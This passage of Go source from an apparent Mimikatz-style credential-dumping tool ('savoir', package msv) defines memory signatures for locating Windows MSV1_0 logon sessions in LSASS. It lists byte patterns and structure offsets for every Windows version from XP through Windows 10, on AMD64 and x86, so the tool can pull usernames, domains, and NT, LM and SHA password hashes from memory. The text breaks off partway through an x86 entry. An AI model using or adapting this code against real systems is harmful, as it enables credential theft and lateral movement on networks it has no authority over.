package msv

import (
	"reflect"

	"github.com/vincd/savoir/modules/sekurlsa/packages/globals"
	"github.com/vincd/savoir/utils/binary"
	"github.com/vincd/savoir/windows"
)

var (
	kiwiMsv10List51Type             = reflect.TypeOf(KiwiMsv10List51{})
	kiwiMsv10List52Type             = reflect.TypeOf(KiwiMsv10List52{})
	kiwiMsv10List60Type             = reflect.TypeOf(KiwiMsv10List60{})
	kiwiMsv10List61Type             = reflect.TypeOf(KiwiMsv10List61{})
	kiwiMsv10List61AntiMimikatzType = reflect.TypeOf(KiwiMsv10List61AntiMimikatz{})
	kiwiMsv10List62Type             = reflect.TypeOf(KiwiMsv10List62{})
	kiwiMsv10List63Type             = reflect.TypeOf(KiwiMsv10List63{})

	kiwiMsv10PrimaryCredential        = reflect.TypeOf(MSV1_0_PRIMARY_CREDENTIAL{})
	kiwiMsv10PrimaryCredential10Old   = reflect.TypeOf(MSV1_0_PRIMARY_CREDENTIAL_10_OLD{})
	kiwiMsv10PrimaryCredential10      = reflect.TypeOf(MSV1_0_PRIMARY_CREDENTIAL_10{})
	kiwiMsv10PrimaryCredential10_1607 = reflect.TypeOf(MSV1_0_PRIMARY_CREDENTIAL_10_1607{})
)

var LogonEntrySignatures = []globals.Signature{
	globals.Signature{
		ProcessorArchitecture: windows.ProcessorArchitectureAMD64,
		BuildNumberMin:        windows.BuildNumberWindowsXP,
		BuildNumberMax:        windows.BuildNumberWindows2K3,
		Pattern:               []byte{0x4c, 0x8b, 0xdf, 0x49, 0xc1, 0xe3, 0x04, 0x48, 0x8b, 0xcb, 0x4c, 0x03, 0xd8},
		Offsets: []int64{
			int64(-4),
			int64(0),
			binary.GetStructureFieldOffset(kiwiMsv10List51Type, "Flink", true),
			binary.GetStructureFieldOffset(kiwiMsv10List51Type, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10List51Type, "Domain", true),
			binary.GetStructureFieldOffset(kiwiMsv10List51Type, "LogonServer", true),
			binary.GetStructureFieldOffset(kiwiMsv10List51Type, "Sid", true),
			binary.GetStructureFieldOffset(kiwiMsv10List51Type, "LocallyUniqueIdentifier", true),
			binary.GetStructureFieldOffset(kiwiMsv10List51Type, "Credentials", true),
			binary.GetStructureFieldOffset(kiwiMsv10List51Type, "CredentialManager", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LogonDomainName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "NtOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LmOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "ShaOwPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10List51Type, "LogonTime", true),
			binary.GetStructureFieldOffset(kiwiMsv10List51Type, "Unk1", true),
		},
	},
	globals.Signature{
		ProcessorArchitecture: windows.ProcessorArchitectureAMD64,
		BuildNumberMin:        windows.BuildNumberWindows2K3,
		BuildNumberMax:        windows.BuildNumberWindowsVista,
		Pattern:               []byte{0x4c, 0x8b, 0xdf, 0x49, 0xc1, 0xe3, 0x04, 0x48, 0x8b, 0xcb, 0x4c, 0x03, 0xd8},
		Offsets: []int64{
			int64(-4),
			int64(-45),
			binary.GetStructureFieldOffset(kiwiMsv10List52Type, "Flink", true),
			binary.GetStructureFieldOffset(kiwiMsv10List52Type, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10List52Type, "Domain", true),
			binary.GetStructureFieldOffset(kiwiMsv10List52Type, "LogonServer", true),
			binary.GetStructureFieldOffset(kiwiMsv10List52Type, "Sid", true),
			binary.GetStructureFieldOffset(kiwiMsv10List52Type, "LocallyUniqueIdentifier", true),
			binary.GetStructureFieldOffset(kiwiMsv10List52Type, "Credentials", true),
			binary.GetStructureFieldOffset(kiwiMsv10List52Type, "CredentialManager", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LogonDomainName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "NtOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LmOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "ShaOwPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10List52Type, "LogonTime", true),
			binary.GetStructureFieldOffset(kiwiMsv10List52Type, "Unk1", true),
		},
	},
	globals.Signature{
		ProcessorArchitecture: windows.ProcessorArchitectureAMD64,
		BuildNumberMin:        windows.BuildNumberWindowsVista,
		BuildNumberMax:        windows.BuildNumberWindows7,
		Pattern:               []byte{0x33, 0xff, 0x45, 0x85, 0xc0, 0x41, 0x89, 0x75, 0x00, 0x4c, 0x8b, 0xe3, 0x0f, 0x84},
		Offsets: []int64{
			int64(21),
			int64(-4),
			binary.GetStructureFieldOffset(kiwiMsv10List60Type, "Flink", true),
			binary.GetStructureFieldOffset(kiwiMsv10List60Type, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10List60Type, "Domain", true),
			binary.GetStructureFieldOffset(kiwiMsv10List60Type, "LogonServer", true),
			binary.GetStructureFieldOffset(kiwiMsv10List60Type, "Sid", true),
			binary.GetStructureFieldOffset(kiwiMsv10List60Type, "LocallyUniqueIdentifier", true),
			binary.GetStructureFieldOffset(kiwiMsv10List60Type, "Credentials", true),
			binary.GetStructureFieldOffset(kiwiMsv10List60Type, "CredentialManager", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LogonDomainName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "NtOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LmOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "ShaOwPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10List60Type, "LogonTime", true),
			binary.GetStructureFieldOffset(kiwiMsv10List60Type, "Unk1", true),
		},
	},
	globals.Signature{
		ProcessorArchitecture: windows.ProcessorArchitectureAMD64,
		BuildNumberMin:        windows.BuildNumberWindows7,
		BuildNumberMax:        windows.BuildNumberWindows8,
		Pattern:               []byte{0x33, 0xf6, 0x45, 0x89, 0x2f, 0x4c, 0x8b, 0xf3, 0x85, 0xff, 0x0f, 0x84},
		Offsets: []int64{
			int64(19),
			int64(-4),
			binary.GetStructureFieldOffset(kiwiMsv10List61Type, "Flink", true),
			binary.GetStructureFieldOffset(kiwiMsv10List61Type, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10List61Type, "Domain", true),
			binary.GetStructureFieldOffset(kiwiMsv10List61Type, "LogonServer", true),
			binary.GetStructureFieldOffset(kiwiMsv10List61Type, "Sid", true),
			binary.GetStructureFieldOffset(kiwiMsv10List61Type, "LocallyUniqueIdentifier", true),
			binary.GetStructureFieldOffset(kiwiMsv10List61Type, "Credentials", true),
			binary.GetStructureFieldOffset(kiwiMsv10List61Type, "CredentialManager", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LogonDomainName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "NtOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LmOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "ShaOwPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10List61Type, "LogonTime", true),
			binary.GetStructureFieldOffset(kiwiMsv10List61Type, "Unk1", true),
		},
	},
	globals.Signature{
		ProcessorArchitecture: windows.ProcessorArchitectureAMD64,
		BuildNumberMin:        windows.BuildNumberWindows7,
		BuildNumberMax:        windows.BuildNumberWindows8,
		Pattern:               []byte{0x33, 0xf6, 0x45, 0x89, 0x2f, 0x4c, 0x8b, 0xf3, 0x85, 0xff, 0x0f, 0x84},
		Offsets: []int64{
			int64(19),
			int64(-4),
			binary.GetStructureFieldOffset(kiwiMsv10List61AntiMimikatzType, "Flink", true),
			binary.GetStructureFieldOffset(kiwiMsv10List61AntiMimikatzType, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10List61AntiMimikatzType, "Domain", true),
			binary.GetStructureFieldOffset(kiwiMsv10List61AntiMimikatzType, "LogonServer", true),
			binary.GetStructureFieldOffset(kiwiMsv10List61AntiMimikatzType, "Sid", true),
			binary.GetStructureFieldOffset(kiwiMsv10List61AntiMimikatzType, "LocallyUniqueIdentifier", true),
			binary.GetStructureFieldOffset(kiwiMsv10List61AntiMimikatzType, "Credentials", true),
			binary.GetStructureFieldOffset(kiwiMsv10List61AntiMimikatzType, "CredentialManager", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LogonDomainName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "NtOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LmOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "ShaOwPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10List61AntiMimikatzType, "LogonTime", true),
			binary.GetStructureFieldOffset(kiwiMsv10List61AntiMimikatzType, "Unk1", true),
		},
	},
	globals.Signature{
		ProcessorArchitecture: windows.ProcessorArchitectureAMD64,
		BuildNumberMin:        windows.BuildNumberWindows8,
		BuildNumberMax:        windows.BuildNumberWindowsBlue,
		Pattern:               []byte{0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74},
		Offsets: []int64{
			int64(16),
			int64(-4),
			binary.GetStructureFieldOffset(kiwiMsv10List62Type, "Flink", true),
			binary.GetStructureFieldOffset(kiwiMsv10List62Type, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10List62Type, "Domain", true),
			binary.GetStructureFieldOffset(kiwiMsv10List62Type, "LogonServer", true),
			binary.GetStructureFieldOffset(kiwiMsv10List62Type, "Sid", true),
			binary.GetStructureFieldOffset(kiwiMsv10List62Type, "LocallyUniqueIdentifier", true),
			binary.GetStructureFieldOffset(kiwiMsv10List62Type, "Credentials", true),
			binary.GetStructureFieldOffset(kiwiMsv10List62Type, "CredentialManager", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LogonDomainName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "NtOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LmOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "ShaOwPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10List62Type, "LogonTime", true),
			binary.GetStructureFieldOffset(kiwiMsv10List62Type, "Unk1", true),
		},
	},
	globals.Signature{
		ProcessorArchitecture: windows.ProcessorArchitectureAMD64,
		BuildNumberMin:        windows.BuildNumberWindows8,
		BuildNumberMax:        windows.BuildNumberWindowsBlue,
		Pattern:               []byte{0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74},
		Offsets: []int64{
			int64(16),
			int64(-4),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Flink", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Domain", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LogonServer", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Sid", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LocallyUniqueIdentifier", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Credentials", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "CredentialManager", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LogonDomainName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "NtOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LmOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "ShaOwPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LogonTime", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Unk1", true),
		},
	},
	globals.Signature{
		ProcessorArchitecture: windows.ProcessorArchitectureAMD64,
		BuildNumberMin:        windows.BuildNumberWindowsBlue,
		BuildNumberMax:        windows.BuildNumberWindows10_1507,
		Pattern:               []byte{0x8b, 0xde, 0x48, 0x8d, 0x0c, 0x5b, 0x48, 0xc1, 0xe1, 0x05, 0x48, 0x8d, 0x05},
		Offsets: []int64{
			int64(36),
			int64(-6),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Flink", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Domain", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LogonServer", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Sid", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LocallyUniqueIdentifier", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Credentials", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "CredentialManager", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LogonDomainName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "NtOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LmOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "ShaOwPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LogonTime", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Unk1", true),
		},
	},
	globals.Signature{
		ProcessorArchitecture: windows.ProcessorArchitectureAMD64,
		BuildNumberMin:        windows.BuildNumberWindows10_1507,
		BuildNumberMax:        windows.BuildNumberWindows10_1511,
		Pattern:               []byte{0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74},
		Offsets: []int64{
			int64(16),
			int64(-4),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Flink", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Domain", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LogonServer", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Sid", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LocallyUniqueIdentifier", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Credentials", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "CredentialManager", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10Old, "LogonDomainName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10Old, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10Old, "NtOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10Old, "LmOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10Old, "ShaOwPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LogonTime", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Unk1", true),
		},
	},
	globals.Signature{
		ProcessorArchitecture: windows.ProcessorArchitectureAMD64,
		BuildNumberMin:        windows.BuildNumberWindows10_1511,
		BuildNumberMax:        windows.BuildNumberWindows10_1607,
		Pattern:               []byte{0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74},
		Offsets: []int64{
			int64(16),
			int64(-4),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Flink", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Domain", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LogonServer", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Sid", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LocallyUniqueIdentifier", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Credentials", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "CredentialManager", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10, "LogonDomainName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10, "NtOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10, "LmOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10, "ShaOwPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LogonTime", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Unk1", true),
		},
	},
	globals.Signature{
		ProcessorArchitecture: windows.ProcessorArchitectureAMD64,
		BuildNumberMin:        windows.BuildNumberWindows10_1607,
		BuildNumberMax:        windows.BuildNumberWindows10_1703,
		Pattern:               []byte{0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74},
		Offsets: []int64{
			int64(16),
			int64(-4),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Flink", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Domain", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LogonServer", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Sid", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LocallyUniqueIdentifier", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Credentials", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "CredentialManager", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "LogonDomainName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "NtOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "LmOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "ShaOwPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LogonTime", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Unk1", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "DPAPIProtected", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "IsDPAPIProtected", true),
		},
	},
	globals.Signature{
		ProcessorArchitecture: windows.ProcessorArchitectureAMD64,
		BuildNumberMin:        windows.BuildNumberWindows10_1703,
		BuildNumberMax:        windows.BuildNumberWindows10_1803,
		Pattern:               []byte{0x33, 0xff, 0x45, 0x89, 0x37, 0x48, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74},
		Offsets: []int64{
			int64(23),
			int64(-4),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Flink", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Domain", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LogonServer", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Sid", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LocallyUniqueIdentifier", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Credentials", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "CredentialManager", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "LogonDomainName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "NtOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "LmOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "ShaOwPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LogonTime", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Unk1", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "DPAPIProtected", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "IsDPAPIProtected", true),
		},
	},
	globals.Signature{
		ProcessorArchitecture: windows.ProcessorArchitectureAMD64,
		BuildNumberMin:        windows.BuildNumberWindows10_1803,
		BuildNumberMax:        windows.BuildNumberWindows10_1903,
		Pattern:               []byte{0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74},
		Offsets: []int64{
			int64(23),
			int64(-4),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Flink", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Domain", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LogonServer", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Sid", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LocallyUniqueIdentifier", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Credentials", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "CredentialManager", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "LogonDomainName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "NtOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "LmOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "ShaOwPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LogonTime", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Unk1", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "DPAPIProtected", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "IsDPAPIProtected", true),
		},
	},
	globals.Signature{
		ProcessorArchitecture: windows.ProcessorArchitectureAMD64,
		BuildNumberMin:        windows.BuildNumberWindows10_1903,
		Pattern:               []byte{0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74},
		Offsets: []int64{
			int64(23),
			int64(-4),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Flink", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Domain", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LogonServer", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Sid", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LocallyUniqueIdentifier", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Credentials", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "CredentialManager", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "LogonDomainName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "UserName", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "NtOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "LmOwfPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "ShaOwPassword", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LogonTime", true),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Unk1", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "DPAPIProtected", true),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10_1607, "IsDPAPIProtected", true),
		},
	},

	// x86
	globals.Signature{
		ProcessorArchitecture: windows.ProcessorArchitectureX86,
		BuildNumberMin:        windows.BuildNumberWindowsXP,
		BuildNumberMax:        windows.BuildNumberWindows2K3,
		Pattern:               []byte{0xff, 0x50, 0x10, 0x85, 0xc0, 0x0f, 0x84},
		Offsets: []int64{
			int64(24),
			int64(0),
			binary.GetStructureFieldOffset(kiwiMsv10List51Type, "Flink", false),
			binary.GetStructureFieldOffset(kiwiMsv10List51Type, "UserName", false),
			binary.GetStructureFieldOffset(kiwiMsv10List51Type, "Domain", false),
			binary.GetStructureFieldOffset(kiwiMsv10List51Type, "LogonServer", false),
			binary.GetStructureFieldOffset(kiwiMsv10List51Type, "Sid", false),
			binary.GetStructureFieldOffset(kiwiMsv10List51Type, "LocallyUniqueIdentifier", false),
			binary.GetStructureFieldOffset(kiwiMsv10List51Type, "Credentials", false),
			binary.GetStructureFieldOffset(kiwiMsv10List51Type, "CredentialManager", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LogonDomainName", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "UserName", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "NtOwfPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LmOwfPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "ShaOwPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10List51Type, "LogonTime", false),
			binary.GetStructureFieldOffset(kiwiMsv10List51Type, "Unk1", false),
		},
	},
	globals.Signature{
		ProcessorArchitecture: windows.ProcessorArchitectureX86,
		BuildNumberMin:        windows.BuildNumberWindows2K3,
		BuildNumberMax:        windows.BuildNumberWindowsVista,
		Pattern:               []byte{0x89, 0x71, 0x04, 0x89, 0x30, 0x8d, 0x04, 0xbd},
		Offsets: []int64{
			int64(-11),
			int64(-43),
			binary.GetStructureFieldOffset(kiwiMsv10List52Type, "Flink", false),
			binary.GetStructureFieldOffset(kiwiMsv10List52Type, "UserName", false),
			binary.GetStructureFieldOffset(kiwiMsv10List52Type, "Domain", false),
			binary.GetStructureFieldOffset(kiwiMsv10List52Type, "LogonServer", false),
			binary.GetStructureFieldOffset(kiwiMsv10List52Type, "Sid", false),
			binary.GetStructureFieldOffset(kiwiMsv10List52Type, "LocallyUniqueIdentifier", false),
			binary.GetStructureFieldOffset(kiwiMsv10List52Type, "Credentials", false),
			binary.GetStructureFieldOffset(kiwiMsv10List52Type, "CredentialManager", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LogonDomainName", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "UserName", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "NtOwfPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LmOwfPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "ShaOwPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10List52Type, "LogonTime", false),
			binary.GetStructureFieldOffset(kiwiMsv10List52Type, "Unk1", false),
		},
	},
	globals.Signature{
		ProcessorArchitecture: windows.ProcessorArchitectureX86,
		BuildNumberMin:        windows.BuildNumberWindowsVista,
		BuildNumberMax:        windows.BuildNumberWindows7,
		Pattern:               []byte{0x89, 0x71, 0x04, 0x89, 0x30, 0x8d, 0x04, 0xbd},
		Offsets: []int64{
			int64(-11),
			int64(-42),
			binary.GetStructureFieldOffset(kiwiMsv10List60Type, "Flink", false),
			binary.GetStructureFieldOffset(kiwiMsv10List60Type, "UserName", false),
			binary.GetStructureFieldOffset(kiwiMsv10List60Type, "Domain", false),
			binary.GetStructureFieldOffset(kiwiMsv10List60Type, "LogonServer", false),
			binary.GetStructureFieldOffset(kiwiMsv10List60Type, "Sid", false),
			binary.GetStructureFieldOffset(kiwiMsv10List60Type, "LocallyUniqueIdentifier", false),
			binary.GetStructureFieldOffset(kiwiMsv10List60Type, "Credentials", false),
			binary.GetStructureFieldOffset(kiwiMsv10List60Type, "CredentialManager", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LogonDomainName", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "UserName", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "NtOwfPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LmOwfPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "ShaOwPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10List60Type, "LogonTime", false),
